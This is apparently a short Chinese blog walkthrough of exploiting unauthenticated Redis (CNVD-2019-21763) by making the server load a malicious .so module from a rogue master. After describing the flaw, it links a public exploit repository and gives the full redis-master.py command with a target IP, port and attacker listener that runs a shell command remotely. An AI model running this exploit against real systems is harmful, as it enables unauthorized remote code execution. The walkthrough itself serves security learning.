redis 未授权访问 (CNVD-2019-21763)

描述:

Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。作为一个高性能的key-value数据库,Redis在部分场景下对关系数据库起到很好的补充作用。

2019年7月7日,LC/BC的成员Pavel Toporkov在WCTF2019 Final分享会上介绍了Redis新版本的远程命令执行漏洞的利用方式。由于在Reids 4.x及以上版本中新增了模块功能,攻击者可通过外部拓展,在Redis中实现一个新的Redis命令。攻击者可以利用该功能引入模块,在未授权访问的情况下使被攻击服务器加载恶意.so 文件,从而实现远程代码执行。

 

首先拉取GitHub上的脚本:https://github.com/vulhub/redis-rogue-getshell.git

按一下操作编译so文件

image

 会得到一个exp.so文件

image

回到上一级目录执行以下命令:

python3 redis-master.py -r 123.58.224.8 -p 21448 -L <攻击机ip> -P 8888 -f redis-rogue-server/exp.so -c "ls /tmp"

屏幕截图 2026-04-17 094110

 

posted @ 2026-04-17 09:43  Morphoko  阅读(34)  评论(0)    收藏  举报